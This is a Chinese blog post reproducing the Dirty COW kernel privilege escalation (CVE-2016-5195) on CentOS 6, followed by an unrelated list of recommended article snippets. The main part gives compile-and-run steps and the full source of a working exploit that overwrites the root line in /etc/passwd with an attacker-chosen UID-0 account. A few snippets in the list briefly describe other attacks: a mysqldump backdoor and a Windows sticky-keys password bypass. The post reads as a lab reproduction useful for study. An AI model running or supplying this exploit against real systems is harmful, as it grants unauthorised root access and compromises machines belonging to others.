大方子
大方子

脏牛提权复现CVE-2016-5195

poc下载:https://github.com/FireFart/dirtycow

一.这里小伙子用的是centos 6,内核版2.6.32,查看版本命令uname -a

脏牛提权复现CVE-2016-5195_第1张图片

可以看到现在是一个普通用户admin

二.打开/etc/passwd查看管理员用户,cat /etc/passwd

脏牛提权复现CVE-2016-5195_第2张图片

超级管理员是root

三.利用gcc编译dirty.c文件,gcc -pthread dirty.c -o dirty -lcrypt

 

四.利用编译好的dirty文件,替换root用户,./dirty password(这里是设置的密码)

 

脏牛提权复现CVE-2016-5195_第3张图片

 

成功替换掉原来的root用户

五.可以查看etc/passwd查看,或者切换下用户看看是否成功

 

脏牛提权复现CVE-2016-5195_第4张图片

poc源代码如下:

//
// This exploit uses the pokemon exploit of the dirtycow vulnerability
// as a base and automatically generates a new passwd line.
// The user will be prompted for the new password when the binary is run.
// The original /etc/passwd file is then backed up to /tmp/passwd.bak
// and overwrites the root account with the generated line.
// After running the exploit you should be able to login with the newly
// created user.
//
// To use this exploit modify the user values according to your needs.
//   The default is "DarkHQ".
//
// Original exploit (dirtycow's ptrace_pokedata "pokemon" method):
//   https://github.com/dirtycow/dirtycow.github.io/blob/master/pokemon.c
//
// Compile with:
//   gcc -pthread dirty.c -o dirty -lcrypt
//
// Then run the newly create binary by either doing:
//   "./dirty" or "./dirty my-new-password"
//
// Afterwards, you can either "su DarkHQ" or "ssh DarkHQ@..."
//
// DON'T FORGET TO RESTORE YOUR /etc/passwd AFTER RUNNING THE EXPLOIT!
//   mv /tmp/passwd.bak /etc/passwd
//
// Exploit adopted by Christian "DarkHQ" Mehlmauer
// https://DarkHQ.at
//

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

const char *filename = "/etc/passwd";
const char *backup_filename = "/tmp/passwd.bak";
const char *salt = "DarkHQ";

int f;
void *map;
pid_t pid;
pthread_t pth;
struct stat st;

struct Userinfo {
   char *username;
   char *hash;
   int user_id;
   int group_id;
   char *info;
   char *home_dir;
   char *shell;
};

char *generate_password_hash(char *plaintext_pw) {
  return crypt(plaintext_pw, salt);
}

char *generate_passwd_line(struct Userinfo u) {
  const char *format = "%s:%s:%d:%d:%s:%s:%s\n";
  int size = snprintf(NULL, 0, format, u.username, u.hash,
    u.user_id, u.group_id, u.info, u.home_dir, u.shell);
  char *ret = malloc(size + 1);
  sprintf(ret, format, u.username, u.hash, u.user_id,
    u.group_id, u.info, u.home_dir, u.shell);
  return ret;
}

void *madviseThread(void *arg) {
  int i, c = 0;
  for(i = 0; i < 200000000; i++) {
    c += madvise(map, 100, MADV_DONTNEED);
  }
  printf("madvise %d\n\n", c);
}

int copy_file(const char *from, const char *to) {
  // check if target file already exists
  if(access(to, F_OK) != -1) {
    printf("File %s already exists! Please delete it and run again\n",
      to);
    return -1;
  }

  char ch;
  FILE *source, *target;

  source = fopen(from, "r");
  if(source == NULL) {
    return -1;
  }
  target = fopen(to, "w");
  if(target == NULL) {
     fclose(source);
     return -1;
  }

  while((ch = fgetc(source)) != EOF) {
     fputc(ch, target);
   }

  printf("%s successfully backed up to %s\n",
    from, to);

  fclose(source);
  fclose(target);

  return 0;
}

int main(int argc, char *argv[])
{
  // backup file
  int ret = copy_file(filename, backup_filename);
  if (ret != 0) {
    exit(ret);
  }

  struct Userinfo user;
  // set values, change as needed
  user.username = "DarkHQ";
  user.user_id = 0;
  user.group_id = 0;
  user.info = "pwned";
  user.home_dir = "/root";
  user.shell = "/bin/bash";

  char *plaintext_pw;

  if (argc >= 2) {
    plaintext_pw = argv[1];
    printf("Please enter the new password: %s\n", plaintext_pw);
  } else {
    plaintext_pw = getpass("Please enter the new password: ");
  }

  user.hash = generate_password_hash(plaintext_pw);
  char *complete_passwd_line = generate_passwd_line(user);
  printf("Complete line:\n%s\n", complete_passwd_line);

  f = open(filename, O_RDONLY);
  fstat(f, &st);
  map = mmap(NULL,
             st.st_size + sizeof(long),
             PROT_READ,
             MAP_PRIVATE,
             f,
             0);
  printf("mmap: %lx\n",(unsigned long)map);
  pid = fork();
  if(pid) {
    waitpid(pid, NULL, 0);
    int u, i, o, c = 0;
    int l=strlen(complete_passwd_line);
    for(i = 0; i < 10000/l; i++) {
      for(o = 0; o < l; o++) {
        for(u = 0; u < 10000; u++) {
          c += ptrace(PTRACE_POKETEXT,
                      pid,
                      map + o,
                      *((long*)(complete_passwd_line + o)));
        }
      }
    }
    printf("ptrace %d\n",c);
  }
  else {
    pthread_create(&pth,
                   NULL,
                   madviseThread,
                   NULL);
    ptrace(PTRACE_TRACEME);
    kill(getpid(), SIGSTOP);
    pthread_join(pth,NULL);
  }

  printf("Done! Check %s to see if the new user was created.\n", filename);
  printf("You can log in with the username '%s' and the password '%s'.\n\n",
    user.username, plaintext_pw);
    printf("\nDON'T FORGET TO RESTORE! $ mv %s %s\n",
    backup_filename, filename);
  return 0;
}

小伙子也尝试了官方的poc,进行测试替换的时候就失败了,还没有找到解决办法,有没有大佬指导指导@@@@@

 

--------------------- 本文来自 张德亮 的CSDN 博客 ,全文地址请点击:https://blog.csdn.net/DarkHQ/article/details/79222879?utm_source=copy

你可能感兴趣的:(技术分享)

  • mysql 隐秘后门_【技术分享】CVE-2016-5483:利用mysqldump备份可生成后门 Toby Dai mysql隐秘后门
    预估稿费:100RMB投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿前言mysqldump是用来创建MySQL数据库逻辑备份的一个常用工具。它在默认配置下可以生成一个.sql文件,其中包含创建/删除表和插入数据等。在导入转储文件的时候,攻击者可以通过制造恶意表名来实现任意SQL语句查询和shell命令执行的目的。另一个与之相关的漏洞利用场景可以参考。攻击场景攻击者已经能够访问
  • 打造高效医院运维团队:一体化监控能力的全方位提升 MXsoft618 运维管理软件运维软件智能运维管理系统运维
    在数字化时代,医院信息系统的稳定运行至关重要。为了提高医院运维团队的一体化运维监控能力,我们需要从多个方面入手,构建一套全面、高效的运维体系。首先,培训和技能提升是基石。我们应该为运维团队提供定期的技术培训,使他们熟练掌握新监控工具的使用技巧,学习系统故障排查方法和性能优化手段。此外,通过组织技术分享会,团队成员能够及时了解最新的运维技术和行业趋势,保持与时俱进。其次,制定标准化流程和规范对于提升
  • 技术分享会回顾|Rust在量化领域如何应用? 非凸科技 Rust招聘量化私募Rust汇报rust开发语言后端
    很多人会问:未来几年,国内量化机构都会考虑用Rust吗?Rust在量化领域如何应用?又有什么独特优势?就高频量化交易系统而言,Rust比C++强吗?如何看待Rust的应用前景?......为满足大家的好奇心,3月6日,非凸科技与Rust中文社区联合举办了一场线上技术分享会。非凸科技北京分公司负责人朱为老师就“国内外量化发展现状、Rust在量化领域应用、典型工作场景以及招聘职位等方面进行了分享。满满
  • 【启明智显技术分享】探讨CAN总线相关知识以及Model3C 2路CAN的应用 启明智显 M系列产品工业HMIHMI芯片CAN启明智显MODEL3C
    一、CAN总线相关知识CAN总线概述CAN(ControllerAreaNetwork)总线是一种高实时性、高可靠性和灵活性的串行通信协议,广泛应用于汽车和工业控制系统中。它由德国BOSCH公司开发,最高速率可达到1Mbps,具有强大的检错和处理机制,以及高抗干扰性和自诊断能力。1、CAN总线特点高实时性:CAN总线采用非破坏性仲裁技术,确保高优先级数据能够优先传输。高可靠性:CAN总线具有强大的
  • uni-app技术分享|开源demo视频呼叫arcall uni-app端技术实现 anyRTC 音视频uni-app技术分享视频通话webrtc呼叫邀请视频通话音视频uni-app
    介绍基本uniapp_arcall是通过uniapp实现的语音通话、视频通话以及相关配套的呼叫邀请。解决向指定用户发起呼叫通知,对方接受后进行通话的场景需求。呼叫邀请基本流程
  • 2022副业项目,无人直播技术分享,一台手机就可以搞定的兼职副业 dieyiwang 自动化
    项目分享假如你在2022年新冠疫情席卷的当下都还没掌握一个网络项目,那你是真的应当反思一下了,所以只有网上+线下双确保,才能确保自己的一个稳定收入给大家分享的是视频无人直播新项目【详尽拆卸】,抖音无人在线,实际上一直都是蓝海项目里的一条瀚海大白鲨,因为他既可在门坎和投资成本很低的并且把转现发挥到极致。一、无人直播详细介绍根据抖音直播平台所进行的没有人直播卖货,根据素材内容(包括照片、短视频、声频)
  • 【QNX+Android虚拟化方案】116 - Android 侧 NFS Client 挂载 QNX NFS Server 目录不成功 问题排查方法 "小夜猫&小懒虫&小财迷"的男人 android
    【QNX+Android虚拟化方案】116-Android侧NFSClient挂载QNXNFSServer目录不成功问题排查方法一、QNX侧1.检查镜像是否挂载成功:/mnt/nfs_shared_dir目录2.检查/mnt/etc/exports文件配置是否正确3.检查nfsd、rpcbind两个服务程序是否在后台工作正常二、Android检查方法基于原生纯净代码,自学总结纯技术分享,不会也不敢
  • 【QNX+Android虚拟化方案】105 - 如何替换 NON-HLOS.bin 中的 Wifi Firmware 固件 "小夜猫&小懒虫&小财迷"的男人 nohlos
    【QNX+Android虚拟化方案】105-如何替换NON-HLOS.bin中的WifiFirmware固件1、提取NON-HLOS.bin中的WifiFirmware出来2、把提取出来的wifi固件放到代码中3、重新打包生成NON-HLOS.bin4、将生成的NON-HLOS.bin与老的NON-HLOS.bin对比5、使用fastboot下载测试wifi基于原生纯净代码,自学总结纯技术分享,不
  • 【QNX+Android虚拟化方案】119 - Android USB相关调试命令 "小夜猫&小懒虫&小财迷"的男人 android
    【QNX+Android虚拟化方案】119-AndroidUSB相关调试命令基于原生纯净代码,自学总结纯技术分享,不会也不敢涉项目、不泄密、不传播代码文档!!!本文禁止转载分享!!!汇总链接:《【QNX+Android虚拟化方案】00-系列文章链接汇总》本文链接:《【QNX+Android虚拟化方案】119-AndroidUSB相关调试命令》telnet192.168.1.1//进入android
  • 技术分享-商品篇-售后退款退货(十八) bobo-rs 技术分享商城篇B2BB2B2CB2C退款退货售后退款商城
    前言我们在前面的内容中聊完了商品、购物、支付、订单等四大金刚,接下来我们在了解一下售后退款在B2C商城中重要性。总所周知我们在日常购物中,支付了不喜欢的商品,或者发现质量问题等,不想要已购买的订单,这时我们会在原订单详情,找到退款功能,进行退款或者退货,这是一个最基本商城功能,所以若是我们设计的商城系统没有退款的这个模块,在各平台小程序是无法进行上架使用的,比如某微,此功能是整个系统闭环的重要节点
  • 技术分享 | app自动化测试(Android)--元素定位方式与隐式等待 霍格沃兹测试开发学社测试人社区 软件测试技能自动化运维
    本文节选自霍格沃兹测试开发学社内部教材元素定位是UI自动化测试中最关键的一步,假如没有定位到元素,也就无法完成对页面的操作。那么在页面中如何定位到想要的元素,本小节讨论Appium元素定位方式。Appium的元素定位方式定位页面的元素有很多方式,比如可以通过ID、accessibility_id、XPath等方式进行元素定位,还可以使用Android、iOS工作引擎里面提供的定位方式。隐式等待设置
  • MyBatis整体架构分析:基础支持层、核心处理层和接口层 阿里Java程序员 程序员java经验分享面试
    欢迎关注专栏:Java架构技术进阶。里面有大量batj面试题集锦,还有各种技术分享,如有好文章也欢迎投稿哦。MyBatis的整体架构分为三层,分别是基础支持层、核心处理层和接口层,如下图所示。基础支持层反射模块该模块对Java原生的反射进行了良好的封装,提供了更加简洁易用的API,方便上层使调用,并且对反射操作进行了一系列优化,例如缓存了类的元数据,提高了反射操作的性能。类型转换模块类型转换模块提
  • web前端技术分享:koa中间件是如何实现的? 程序员的小傲娇 web前端编程语言web
    在前端开发过程中我们可能会使用到koa中间件,但很多同学却不知道它是如何实现的,下面小千就来给大家介绍一下这个koa中间件(洋葱模型)。一、问题分析asyncawait是promise的语法糖,await后面跟一个promise,所以上面的代码可以写成:改成这样更好理解一些,所以流程控制的核心在于next的实现。next要求调用队列中下一个middleware,当达到最后一个的时候resolve。
  • 黄金三年,京东后端新人的技术破茧之路 京东零售技术 技术成长
    作者:京麦研发李泽阳引言2021年毕业于中国科学院大学,作为校招新力量入职京东,目前主要负责商家内容资讯和商家AI智能助手。工作中追求做实事,做有价值的事,乐于技术分享,撰写的文章多次在京东云、京东零售技术传播。先后获得部门年度卓越员工、618卓越个人、京东技术品牌影响力新星。生活中喜爱马拉松跑步和旅行摄影,找不到答案的时候,就去看看这个世界。本文主要讲述了作为应届毕业生从校园到职场,黄金三年的进
  • 【PHP进阶】Redis管道技术的实际运用 程序员若风+ phpredisbootstrap
    大家好,我是程序员若风,又到了技术分享时刻。今天我们来讲讲Redis管道技术Redis管道技术介绍Redis流水线技术是一种通过同时发出多个命令来提高性能的技术,而无需等待对每个单独命令的响应。大多数Redis客户端都支持流水线操作。–官网英文直译若风粗暴解释如果我们同时有10个查询命令要执行,如果不借助管道技术,那么就是10次网络IO请求,借助管道技术,我们可以将10条命令打包同时传输给Redi
  • 【PHP进阶】Redis管道技术的实际运用 程序员若风+ 后端
    大家好,我是程序员若风,又到了技术分享时刻。今天我们来讲讲Redis管道技术Redis管道技术介绍Redis流水线技术是一种通过同时发出多个命令来提高性能的技术,而无需等待对每个单独命令的响应。大多数Redis客户端都支持流水线操作。--官网英文直译若风粗暴解释如果我们同时有10个查询命令要执行,如果不借助管道技术,那么就是10次网络IO请求,借助管道技术,我们可以将10条命令打包同时传输给Red
  • 技术分享 | Web自动化之Selenium安装 霍格沃兹测试开发学社
    ⬇️复制“下方链接”,提升测试核心竞争力!更多技术文章分享和免费资料领取原文链接Web应用程序的验收测试常常涉及一些手工任务,例如打开一个浏览器,并执行一个测试用例中所描述的操作。但是手工执行的任务容易出现人为的错误,也比较费时间。因此,将这些任务自动化,就可以消除人为因素。Selenium可以帮助我们自动化完成验收测试,通过构建更严格的测试,从而使软件更为可靠也更易于维护。Selenium支持W
  • 统信UOS_麒麟KYLINOS上不覆盖高版本依赖包的情况下批量安装软件 鹏大圣运维 linux统信UOSlinux操作系统国产化服务器桌面统信麒麟
    原文链接:统信UOS/麒麟KYLINOS上在不覆盖高版本依赖包的情况下批量安装软件大家好!在使用基于Debian的Linux发行版,如统信UOS和麒麟KYLINOS时,deb包作为软件安装包的格式非常常见。今天,我将为大家带来一个实用的技术分享,即如何在不覆盖系统中已有更高版本软件依赖包的情况下,批量安装deb包。这个需求在日常管理工作中尤为重要,尤其是当我们需要在多台机器上部署软件,或者更新某个
  • 技术分享 | 测试平台开发-前端开发之数据展示与分析 霍格沃兹_Tester
    测试平台的数据展示与分析,我们主要使用开源工具ECharts来进行数据的展示与分析。ECharts简介与安装ECharts是一款基于JavaScript的数据可视化图表库,提供直观,生动,可交互,可个性化定制的数据可视化图表,功能非常强大,目前ECharts已经发布到ECharts5版本。我们的项目也选择Echarts来作为我们的数据展示与分析工具。ECharts官网:https://echart
  • 非常不错!来教你用 Python 批量生成 PDF 文档 VIP_CQCRE pythonjava编程语言linux人工智能
    这是「进击的Coder」的第495篇技术分享作者:Ckend来源:Python实用宝典“阅读本文大概需要4分钟。”日常办公中,经常会使用PDF文档,难免需要对PDF文档进行编辑,有时候PDF文档中的大部分内容都是一样的,只是发送对象不同。这种模板套用的场景下,使用Python进行自动化就尤为方便,用最短的时间办最高效的事。今天就给大家讲讲如何用Python自动套用模板批量生成下方这样的PDF文档。
  • 我的创作纪念日 OldGj_ 创作
    机缘成为CSDN博客网站创作者初心记录成长:作为大二学生,我深知在技术领域的学习是一个持续不断的过程。通过在CSDN博客上记录我的学习经历和成长,我可以清晰地追踪自己的进步,并为未来的学习和职业发展做好记录和总结。技术知识分享:我将我的CSDN博客视为一个技术分享的平台,我希望通过分享我的Java技术栈内容和数据结构相关知识,帮助其他学习者更好地理解和掌握这些知识,共同进步。自我技术提升:通过在C
  • 见世面的成本有多低?这几个技术公众号告诉你答案 傅一平
    独乐乐,不如众乐乐,为您精选以下公众号!人工智能爱好者社区专注人工智能、机器学习、数据科学等顶尖技术前沿科技成果研究、实战技巧。每周会有书豪采访记系列采访技术大佬文章和原创漫画文章,立即关注,掌握人工智能最新资讯与成果。号主是《R数据科学实战:工具详解与案例分析》书籍作者。大数据分析挖掘和Python机器学习商业智能BI、数据分析、数据挖掘、大数据、Python、机器学习、深度学习、算法等技术分享
  • C#/.NET/.NET Core学习、工作 He少年 .net.netcorec#数据结构
    ‍C#/.NET/.NETCore学习、工作、面试指南让现在的自己不再迷茫✨✨✨。DotNetGuideDotNetGuide技术社区是一个面向.NET开发者的开源技术社区,旨在为开发者们提供全面的C#/.NET/.NETCore相关学习资料、技术分享和咨询、项目推荐、招聘资讯和解决问题的平台。在这个社区中,开发者们可以分享自己的技术文章、项目经验、遇到的疑难技术问题以及解决方案,并且还有机会结识
  • 一文彻底搞懂数据库三范式 数据库
    一个三线城市的国企码农,热爱技术,在这里和大家分享在国企搞技术的点点滴滴。欢迎大家关注我的微信公众号:果冻想前言每天开各种会议,这不刚刚结束的组织生活会的批评环节,我又收到了一条批评,说我技术分享不多,不够,没有有效起到传帮带的作用。好吧,以后就把这些日常的传帮带都总结起来,发到这里,作为一个记录,也以备组内小兄弟们后续翻阅查看。这几天在整理数据库表的时候,看到之前的支撑方建的那些表,简直不忍直视
  • 技术分享 | 关于 MySQL Online DDL 有趣的验证 爱可生开源社区
    作者:胡存存爱可生DBA团队成员,主要负责MySQL故障处理和SQL审核优化。对技术执着,为客户负责。本文来源:原创投稿*爱可生开源社区出品,原创内容未经授权不得随意使用,转载请联系小编并注明来源。MySQL在5.6引入OnlineDDL之后,在5.7和8.0版本又对这一功能进行了大幅的优化。尤其是在8.0之后,已经实现了列的秒加。在5.7中有些DDL操作也实现了秒修改,比如修改字段的默认值,修改
  • 常见内网穿透工具,收好了! 互联网架构
    因公众号更改推送规则,请点“在看”并加“星标”第一时间获取精彩技术分享点击关注#互联网架构师公众号,领取架构师全套资料都在这里0、2T架构师学习资料干货分上一篇:2T架构师学习资料干货分享大家好,我是互联网架构师!文章来源:https://v0w.top/2020/08/11/IntranetProxy/前言本文以渗透的视角,总结几种个人常用的内网穿透,内网代理工具,介绍其简单原理和使用方法。1.
  • 技术分享 | kubernetes operator 简介 爱可生开源社区
    作者:沈亚军爱可生研发团队成员,负责公司DMP产品的后端开发,爱好太广,三天三夜都说不完,低调低调...本文来源:原创投稿*爱可生开源社区出品,原创内容未经授权不得随意使用,转载请联系小编并注明来源。k8soperator介绍k8sOperator是一种用于特定应用的控制器,可扩展KubernetesAPI的功能,来代表k8s用户创建、配置和管理复杂应用的实例,它基于基本k8s资源和控制器概念构建
  • Java后端开发三年,你不得不了解的JVM zwb_jianshu
    喜欢的朋友可以关注下专栏:Java架构技术进阶。里面有大量batj面试题集锦,还有各种技术分享,如有好文章也欢迎投稿哦。JAVA程序员,三年是个坎,如果过了三年你还没有去研究JVM的话,那么你这个程序员只能是板砖的工具了。下面来个JVM的解析可好?JVM是JavaVirtualMachine(Java虚拟机)的缩写,也就是指的JVM虚拟机,属于是一种虚构出来的计算机,在我们实际的电脑上来进行模拟各
  • 利用Windows10漏洞破解密码(保姆级教学) 可惜已不在 windows安全windows
    前言:本篇博客只是技术分享并非非法传播知识,实验内容均是在虚拟机中进行,并非真实环境正文:一.windows10电脑密码破解1)开启windows10虚拟机,停留在这个页面2)按5次Shift键,出现这个粘滞键,如果没有出现的,则说明漏洞已经修复3)重新启动,在这个页面的时候,再次重新启动4)到出现这个页面的时候停止5)输入命令notepad打开记事本6)点击文件,选择所有文件7)打开路径C:/W
  • 前端技术分享:页面性能优化问题复盘 有道AI情报局 有道技术团队前端性能优化javascript
    项目背景在code_pc项目中,前端需要使用rrweb对老师教学内容进行录制,学员可以进行录制回放。为减小录制文件体积,当前的录制策略是先录制一次全量快照,后续录制增量快照,录制阶段实际就是通过MutationObserver监听DOM元素变化,然后将一个个事件push到数组中。为了进行持久化存储,可以将录制数据压缩后序列化为JSON文件。老师会将JSON文件放入课件包中,打成压缩包上传到教务系统
  • java观察者模式 3213213333332132 java设计模式游戏观察者模式
    观察者模式——顾名思义,就是一个对象观察另一个对象,当被观察的对象发生变化时,观察者也会跟着变化。 在日常中,我们配java环境变量时,设置一个JAVAHOME变量,这就是被观察者,使用了JAVAHOME变量的对象都是观察者,一旦JAVAHOME的路径改动,其他的也会跟着改动。 这样的例子很多,我想用小时候玩的老鹰捉小鸡游戏来简单的描绘观察者模式。 老鹰会变成观察者,母鸡和小鸡是
  • TFS RESTful API 模拟上传测试 ronin47
           TFS RESTful API 模拟上传测试。    细节参看这里:https://github.com/alibaba/nginx-tfs/blob/master/TFS_RESTful_API.markdown 模拟POST上传一个图片: curl --data-binary @/opt/tfs.png http
  • PHP常用设计模式单例, 工厂, 观察者, 责任链, 装饰, 策略,适配,桥接模式 dcj3sjt126com 设计模式PHP
    // 多态, 在JAVA中是这样用的, 其实在PHP当中可以自然消除, 因为参数是动态的, 你传什么过来都可以, 不限制类型, 直接调用类的方法 abstract class Tiger { public abstract function climb(); } class XTiger extends Tiger { public function climb()
  • hibernate 171815164 Hibernate
    main,save Configuration conf =new Configuration().configure(); SessionFactory sf=conf.buildSessionFactory(); Session sess=sf.openSession(); Transaction tx=sess.beginTransaction(); News a=new
  • Ant实例分析 g21121 ant
            下面是一个Ant构建文件的实例,通过这个实例我们可以很清楚的理顺构建一个项目的顺序及依赖关系,从而编写出更加合理的构建文件。           下面是build.xml的代码: <?xml version="1
  • [简单]工作记录_接口返回405原因 53873039oycg 工作
             最近调接口时候一直报错,错误信息是:       responseCode:405 responseMsg:Method Not Allowed        接口请求方式Post.
  • 关于java.lang.ClassNotFoundException 和 java.lang.NoClassDefFoundError 的区别 程序员是怎么炼成的
       真正完成类的加载工作是通过调用 defineClass来实现的;  而启动类的加载过程是通过调用 loadClass来实现的;  就是类加载器分为加载和定义   protected Class<?> findClass(String name) throws ClassNotFoundExcept
  • JDBC学习笔记-JDBC详细的操作流程 aijuans jdbc
    所有的JDBC应用程序都具有下面的基本流程:  1、加载数据库驱动并建立到数据库的连接。  2、执行SQL语句。  3、处理结果。  4、从数据库断开连接释放资源。 下面我们就来仔细看一看每一个步骤: 其实按照上面所说每个阶段都可得单独拿出来写成一个独立的类方法文件。共别的应用来调用。 1、加载数据库驱动并建立到数据库的连接:   Html代码  St
  • rome创建rss antonyup_2006 tomcatcmsxmlstrutsOpera
    引用 1.RSS标准 RSS标准比较混乱,主要有以下3个系列 RSS 0.9x / 2.0 : RSS技术诞生于1999年的网景公司(Netscape),其发布了一个0.9版本的规范。2001年,RSS技术标准的发展工作被Userland Software公司的戴夫 温那(Dave Winer)所接手。陆续发布了0.9x的系列版本。当W3C小组发布RSS 1.0后,Dave W
  • html表格和表单基础 百合不是茶 html表格表单meta锚点
    第一次用html来写东西,感觉压力山大,每次看见别人发的都是比较牛逼的 再看看自己什么都还不会,   html是一种标记语言,其实很简单都是固定的格式   _----------------------------------------表格和表单 表格是html的重要组成部分,表格用在body里面的 主要用法如下; <table> &
  • ibatis如何传入完整的sql语句 bijian1013 javasqlibatis
            ibatis如何传入完整的sql语句?进一步说,String str ="select * from test_table",我想把str传入ibatis中执行,是传递整条sql语句。         解决办法: <
  • 精通Oracle10编程SQL(14)开发动态SQL bijian1013 oracle数据库plsql
    /* *开发动态SQL */ --使用EXECUTE IMMEDIATE处理DDL操作 CREATE OR REPLACE PROCEDURE drop_table(table_name varchar2) is sql_statement varchar2(100); begin sql_statement:='DROP TABLE '||table_name;
  • 【Linux命令】Linux工作中常用命令 bit1129 linux命令
    不断的总结工作中常用的Linux命令   1.查看端口被哪个进程占用   通过这个命令可以得到占用8085端口的进程号,然后通过ps -ef|grep 进程号得到进程的详细信息   netstat -anp | grep 8085   察看进程ID对应的进程占用的端口号   netstat -anp | grep 进程ID &
  • 优秀网站和文档收集 白糖_ 网站
    集成 Flex, Spring, Hibernate 构建应用程序   性能测试工具-JMeter   Hmtl5-IOCN网站   Oracle精简版教程网站   鸟哥的linux私房菜   Jetty中文文档   50个jquery必备代码片段   swfobject.js检测flash版本号工具
  • angular.extend boyitech AngularJSangular.extendAngularJS API
    angular.extend 复制src对象中的属性去dst对象中. 支持多个src对象. 如果你不想改变一个对象,你可以把dst设为空对象{}: var object = angular.extend({}, object1, object2). 注意: angular.extend不支持递归复制. 使用方法: angular.extend(dst, src); 参数:
  • java-谷歌面试题-设计方便提取中数的数据结构 bylijinnan java
    网上找了一下这道题的解答,但都是提供思路,没有提供具体实现。其中使用大小堆这个思路看似简单,但实现起来要考虑很多。 以下分别用排序数组和大小堆来实现。 使用大小堆: import java.util.Arrays; public class MedianInHeap { /** * 题目:设计方便提取中数的数据结构 * 设计一个数据结构,其中包含两个函数,1.插
  • ajaxFileUpload 针对 ie jquery 1.7+不能使用问题修复版本 Chen.H ajaxFileUploadie6ie7ie8ie9
    jQuery.extend({ handleError: function( s, xhr, status, e ) { // If a local callback was specified, fire it if ( s.error ) { s.error.call( s.context || s, xhr, status, e ); }
  • [机器人制造原则]机器人的电池和存储器必须可以替换 comsci 制造
           机器人的身体随时随地可能被外来力量所破坏,但是如果机器人的存储器和电池可以更换,那么这个机器人的思维和记忆力就可以保存下来,即使身体受到伤害,在把存储器取下来安装到一个新的身体上之后,原有的性格和能力都可以继续维持.....        另外,如果一
  • Oracle Multitable INSERT 的用法 daizj oracle
    转载Oracle笔记-Multitable INSERT 的用法 http://blog.chinaunix.net/uid-8504518-id-3310531.html 一、Insert基础用法 语法:     Insert Into 表名 (字段1,字段2,字段3...)     Values (值1,
  • 专访黑客历史学家George Dyson datamachine on
    20世纪最具威力的两项发明——核弹和计算机出自同一时代、同一群年青人。可是,与大名鼎鼎的曼哈顿计划(第二次世界大战中美国原子弹研究计划)相 比,计算机的起源显得默默无闻。出身计算机世家的历史学家George Dyson在其新书《图灵大教堂》(Turing’s Cathedral)中讲述了阿兰·图灵、约翰·冯·诺依曼等一帮子天才小子创造计算机及预见计算机未来
  • 小学6年级英语单词背诵第一课 dcj3sjt126com englishword
    always 总是 rice 水稻,米饭 before 在...之前 live 生活,居住   usual 通常的 early 早的 begin 开始 month 月份   year 年 last 最后的 east 东方的 high 高的   far 远的 window 窗户 world 世界 than 比...更  
  • 在线IT教育和在线IT高端教育 dcj3sjt126com 教育
    codecademy  http://www.codecademy.com codeschool  https://www.codeschool.com teamtreehouse  http://teamtreehouse.com lynda http://www.lynda.com/ Coursera https://www.coursera.
  • Struts2 xml校验框架所定义的校验文件 蕃薯耀 Struts2 xml校验Struts2 xml校验框架Struts2校验
      >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> 蕃薯耀 2015年7月11日 15:54:59 星期六 http://fa
  • mac下安装rar和unrar命令 hanqunfeng mac
    1.下载:http://www.rarlab.com/download.htm 选择 RAR 5.21 for Mac OS X 2.解压下载后的文件 tar -zxvf rarosx-5.2.1.tar 3.cd rar sudo install -c -o $USER unrar /bin #输入当前用户登录密码 sudo install -c -o $USER rar
  • 三种将list转换为map的方法 jackyrong list
      在本文中,介绍三种将list转换为map的方法: 1) 传统方法 假设有某个类如下    class Movie { private Integer rank; private String description; public Movie(Integer rank, String des
  • 年轻程序员需要学习的5大经验 lampcy 工作PHP程序员
    在过去的7年半时间里,我带过的软件实习生超过一打,也看到过数以百计的学生和毕业生的档案。我发现很多事情他们都需要学习。或许你会说,我说的不就是某种特定的技术、算法、数学,或者其他特定形式的知识吗?没错,这的确是需要学习的,但却并不是最重要的事情。他们需要学习的最重要的东西是“自我规范”。这些规范就是:尽可能地写出最简洁的代码;如果代码后期会因为改动而变得凌乱不堪就得重构;尽量删除没用的代码,并添加
  • 评“女孩遭野蛮引产致终身不育 60万赔偿款1分未得”医腐深入骨髓 nannan408
    先来看南方网的一则报道: 再正常不过的结婚、生子,对于29岁的郑畅来说,却是一个永远也无法实现的梦想。从2010年到2015年,从24岁到29岁,一张张新旧不一的诊断书记录了她病情的同时,也清晰地记下了她人生的悲哀。   粗暴手术让人发寒   2010年7月,在酒店做服务员的郑畅发现自己怀孕了,可男朋友却联系不上。在没有和家人商量的情况下,她决定堕胎。   12月5日,
  • 使用jQuery为input输入框绑定回车键事件 VS 为a标签绑定click事件 Everyday都不同 jspinput回车键绑定clickenter
    假设如题所示的事件为同一个,必须先把该js函数抽离出来,该函数定义了监听的处理:   function search() { //监听函数略...... }   为input框绑定回车事件,当用户在文本框中输入搜索关键字时,按回车键,即可触发search():   //回车绑定 $(".search").keydown(fun
  • EXT学习记录 tntxia ext
      1. 准备   (1) 官网:http://www.sencha.com/   里面有源代码和API文档下载。   EXT的域名已经从www.extjs.com改成了www.sencha.com ,但extjs这个域名会自动转到sencha上。   (2)帮助文档:   想要查看EXT的官方文档的话,可以去这里h
  • mybatis3的mapper文件报Referenced file contains errors xingguangsixian mybatis
    最近使用mybatis.3.1.0时无意中碰到一个问题: The errors below were detected when validating the file "mybatis-3-mapper.dtd" via the file "account-mapper.xml". In most cases these errors can be d
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他